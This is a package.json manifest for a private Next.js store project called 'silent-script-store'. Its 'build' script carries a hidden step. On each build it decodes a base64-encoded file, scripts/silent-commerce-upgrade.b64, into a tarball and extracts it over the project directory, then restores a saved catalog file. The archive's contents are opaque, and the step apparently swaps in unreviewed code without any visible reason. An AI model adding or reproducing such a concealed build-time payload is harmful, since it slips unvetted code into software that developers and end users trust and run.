{
  "name": "silent-script-store",
  "version": "2.0.0",
  "private": true,
  "scripts": {
    "dev": "next dev",
    "build": "test -f data/catalog.json && cp data/catalog.json /tmp/silent-script-catalog.json || true; base64 --decode scripts/silent-commerce-upgrade.b64 > /tmp/silent-upgrade.tar.gz && tar -xzf /tmp/silent-upgrade.tar.gz -C .; test -f /tmp/silent-script-catalog.json && cp /tmp/silent-script-catalog.json data/catalog.json || true; next build",
    "start": "next start",
    "typecheck": "tsc --noEmit"
  },
  "dependencies": {
    "next": "16.2.11",
    "react": "19.2.0",
    "react-dom": "19.2.0"
  },
  "devDependencies": {
    "@types/node": "24.1.0",
    "@types/react": "19.1.9",
    "@types/react-dom": "19.1.7",
    "typescript": "5.8.3"
  },
  "engines": {
    "node": ">=20.9.0"
  }
}
